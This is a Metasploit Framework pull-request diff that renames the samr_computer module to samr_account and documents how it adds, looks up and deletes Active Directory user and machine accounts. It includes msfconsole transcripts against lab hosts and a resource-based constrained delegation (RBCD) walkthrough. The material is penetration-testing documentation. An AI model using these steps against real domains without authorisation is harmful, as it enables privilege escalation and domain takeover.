Merge pull request #19696 from smashery/add_user_module

Add user module

docs/metasploit-framework.wiki/Metasploit-Guide-SMB.md

@@ -169,7 +169,7 @@ Local File System Commands
 This session also works with the following modules:
 
   auxiliary/admin/dcerpc/icpr_cert
-  auxiliary/admin/dcerpc/samr_computer
+  auxiliary/admin/dcerpc/samr_account
   auxiliary/admin/smb/delete_file
   auxiliary/admin/smb/download_file
   auxiliary/admin/smb/psexec_ntdsgrab

documentation/modules/auxiliary/admin/dcerpc/samr_account.md

@@ -0,0 +1,109 @@
+## Vulnerable Application
+Add, lookup and delete user / machine accounts via MS-SAMR. By default standard active directory users can add up to 10
+new computers to the domain (MachineAccountQuota). Administrative privileges however are required to delete the created
+accounts, or to create/delete user accounts.
+
+## Verification Steps
+
+1. From msfconsole
+2. Do: `use auxiliary/admin/dcerpc/samr_account`
+3. Set the `RHOSTS`, `SMBUser` and `SMBPass` options
+   1. Set the `ACCOUNT_NAME` option for `DELETE_ACCOUNT` and `LOOKUP_ACCOUNT` actions
+4. Run the module and see that a new machine account was added
+
+## Options
+
+### SMBDomain
+
+The Windows domain to use for authentication. The domain will automatically be identified if this option is left in its
+default value.
+
+### ACCOUNT_NAME
+
+The account name to add, lookup or delete. This option is optional for the `ADD_COMPUTER` action, and required for the
+`ADD_USER`, `LOOKUP_ACCOUNT` and `DELETE_ACCOUNT` actions. If left blank for `ADD_COMPUTER`, a random, realistic name
+will be generated.
+
+### ACCOUNT_PASSWORD
+
+The password for the new account. This option is only used for the `ADD_COMPUTER` and `ADD_USER` actions. If left 
+blank, a random value will be generated.
+
+## Actions
+
+### ADD_COMPUTER
+
+Add a new computer to the domain. This action will fail with status `STATUS_DS_MACHINE_ACCOUNT_QUOTA_EXCEEDED` if the
+user has exceeded the maximum number of computer accounts that they are allowed to create.
+
+After the computer account is created, the password will be set for it. If `ACCOUNT_NAME` is set, that value will be
+used and the module will fail if the specified name is already in use. If `ACCOUNT_NAME` is *not* set, a random value
+will be used.
+
+### ADD_USER
+
+Add a new user to the domain. The account being used to create the new user must have permission to do so. 
+
+After the user account is created, the password will be set for it. The `ACCOUNT_NAME` option must be set to the name of
+the account to create. The module will fail if the specified name is already in use.
+
+### DELETE_ACCOUNT
+
+Delete a user or computer account from the domain. This action requires that the `ACCOUNT_NAME` option be set.
+
+### LOOKUP_ACCOUNT
+
+Lookup a user or computer account in the domain. This action verifies that the specified account exists, and looks up
+its security ID (SID), which includes the relative ID (RID) as the last component.
+
+## Scenarios
+
+### Windows Server 2019
+
+First, a new computer account is created and its details are logged to the database.
+
+```
+msf6 auxiliary(admin/dcerpc/samr_account) > set RHOSTS 192.168.159.96
+RHOSTS => 192.168.159.96
+msf6 auxiliary(admin/dcerpc/samr_account) > set SMBUser aliddle
+SMBUser => aliddle
+msf6 auxiliary(admin/dcerpc/samr_account) > set SMBPass Password1
+SMBPass => Password1
+msf6 auxiliary(admin/dcerpc/samr_account) > show options
+
+Module options (auxiliary/admin/dcerpc/samr_account):
+
+   Name              Current Setting  Required  Description
+   ----              ---------------  --------  -----------
+   ACCOUNT _NAME                      no        The computer name
+   ACCOUNT_PASSWORD                   no        The password for the new computer
+   RHOSTS            192.168.159.96   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT             445              yes       The target port (TCP)
+   SMBDomain         .                no        The Windows domain to use for authentication
+   SMBPass           Password1        no        The password for the specified username
+   SMBUser           aliddle          no        The username to authenticate as
+
+
+Auxiliary action:
+
+   Name          Description
+   ----          -----------
+   ADD_COMPUTER  Add a computer account
+
+
+msf6 auxiliary(admin/dcerpc/samr_account) > run
+[*] Running module against 192.168.159.96
+
+[*] 192.168.159.96:445 - Using automatically identified domain: MSFLAB
+[+] 192.168.159.96:445 - Successfully created MSFLAB\DESKTOP-2X8F54QG$ with password MCoDkNALd3SdGR1GoLhqniEkWa8Me9FY
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/dcerpc/samr_account) > creds
+Credentials
+===========
+
+host            origin          service        public             private                           realm   private_type  JtR Format
+----            ------          -------        ------             -------                           -----   ------------  ----------
+192.168.159.96  192.168.159.96  445/tcp (smb)  DESKTOP-2X8F54QG$  MCoDkNALd3SdGR1GoLhqniEkWa8Me9FY  MSFLAB  Password
+
+msf6 auxiliary(admin/dcerpc/samr_account) >
+```

documentation/modules/auxiliary/admin/ldap/rbcd.md

@@ -62,14 +62,14 @@ PropagationFlags      : None
 
 ## Module usage
 
-The `admin/dcerpc/samr_computer` module is generally used to first create a computer account, which requires no permissions:
+The `admin/dcerpc/samr_account` module is generally used to first create a computer account, which by default, all user accounts in a domain can perform:
 
 1. From msfconsole
-2. Do: `use auxiliary/admin/dcerpc/samr_computer`
+2. Do: `use auxiliary/admin/dcerpc/samr_account`
 3. Set the `RHOSTS`, `SMBUser` and `SMBPass` options
-   a. For the `ADD_COMPUTER` action, if you don't specify `COMPUTER_NAME` or `COMPUTER_PASSWORD` - one will be generated automatically
-   b. For the `DELETE_COMPUTER` action, set the `COMPUTER_NAME` option
-   c. For the `LOOKUP_COMPUTER` action, set the `COMPUTER_NAME` option
+   a. For the `ADD_COMPUTER` action, if you don't specify `ACCOUNT_NAME` or `ACCOUNT_PASSWORD` - one will be generated automatically
+   b. For the `DELETE_ACCOUNT` action, set the `ACCOUNT_NAME` option
+   c. For the `LOOKUP_ACCOUNT` action, set the `ACCOUNT_NAME` option
 4. Run the module and see that a new machine account was added
 
 Then the `auxiliary/admin/ldap/rbcd` can be used:
@@ -121,19 +121,30 @@ with the Service for User (S4U) Kerberos extension.
 First create the computer account:
 
 ```msf
-msf6 auxiliary(admin/dcerpc/samr_computer) > show options
+msf6 auxiliary(admin/dcerpc/samr_account) > show options
 
-Module options (auxiliary/admin/dcerpc/samr_computer):
+   Name              Current Setting  Required  Description
+   ----              ---------------  --------  -----------
+   ACCOUNT_NAME                       no        The account name
+   ACCOUNT_PASSWORD                   no        The password for the new account
 
-   Name               Current Setting  Required  Description
-   ----               ---------------  --------  -----------
-   COMPUTER_NAME                       no        The computer name
-   COMPUTER_PASSWORD                   no        The password for the new computer
-   RHOSTS                              yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
-   RPORT              445              yes       The target port (TCP)
-   SMBDomain          .                no        The Windows domain to use for authentication
-   SMBPass                             no        The password for the specified username
-   SMBUser                             no        The username to authenticate as
+
+   Used when connecting via an existing SESSION:
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SESSION                   no        The session to run this module on
+
+
+   Used when making a new connection via RHOSTS:
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   RHOSTS                      no        The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT      445              yes       The target port (TCP)
+   SMBDomain  .                no        The Windows domain to use for authentication
+   SMBPass                     no        The password for the specified username
+   SMBUser                     no        The username to authenticate as
 
 
 Auxiliary action:
@@ -143,21 +154,21 @@ Auxiliary action:
    ADD_COMPUTER  Add a computer account
 
 
-msf6 auxiliary(admin/dcerpc/samr_computer) > set RHOSTS 192.168.159.10
+msf6 auxiliary(admin/dcerpc/samr_account) > set RHOSTS 192.168.159.10
 RHOSTS => 192.168.159.10
-msf6 auxiliary(admin/dcerpc/samr_computer) > set SMBUser sandy
+msf6 auxiliary(admin/dcerpc/samr_account) > set SMBUser sandy
 SMBUser => sandy
-msf6 auxiliary(admin/dcerpc/samr_computer) > set SMBPass Password1!
+msf6 auxiliary(admin/dcerpc/samr_account) > set SMBPass Password1!
 SMBPass => Password1!
-msf6 auxiliary(admin/dcerpc/samr_computer) > run
+msf6 auxiliary(admin/dcerpc/samr_account) > run
 [*] Running module against 192.168.159.10
 
 [*] 192.168.159.10:445 - Using automatically identified domain: MSFLAB
 [+] 192.168.159.10:445 - Successfully created MSFLAB\DESKTOP-QLSTR9NW$
 [+] 192.168.159.10:445 -   Password: A2HPEkkQzdxQirylqIj7BxqwB7kuUMrT
 [+] 192.168.159.10:445 -   SID:      S-1-5-21-3402587289-1488798532-3618296993-1655
 [*] Auxiliary module execution completed
-msf6 auxiliary(admin/dcerpc/samr_computer) > use auxiliary/admin/ldap/rbcd
+msf6 auxiliary(admin/dcerpc/samr_account) > use auxiliary/admin/ldap/rbcd
 ```
 
 Now use the RBCD module to read the current value of `msDS-AllowedToActOnBehalfOfOtherIdentity`:
@@ -181,7 +192,7 @@ msf6 auxiliary(admin/ldap/rbcd) > read
 [*] Auxiliary module execution completed
 ```
 
-Writing a new `msDS-AllowedToActOnBehalfOfOtherIdentity` value using the computer account created by `admin/dcerpc/samr_computer`:
+Writing a new `msDS-AllowedToActOnBehalfOfOtherIdentity` value using the computer account created by `admin/dcerpc/samr_account`:
 
 ```msf
 msf6 auxiliary(admin/ldap/rbcd) > set DELEGATE_FROM DESKTOP-QLSTR9NW$

documentation/modules/auxiliary/scanner/smb/smb_login.md

@@ -138,7 +138,7 @@ Local File System Commands
 This session also works with the following modules:
 
   auxiliary/admin/dcerpc/icpr_cert
-  auxiliary/admin/dcerpc/samr_computer
+  auxiliary/admin/dcerpc/samr_account
   auxiliary/admin/smb/delete_file
   auxiliary/admin/smb/download_file
   auxiliary/admin/smb/psexec_ntdsgrab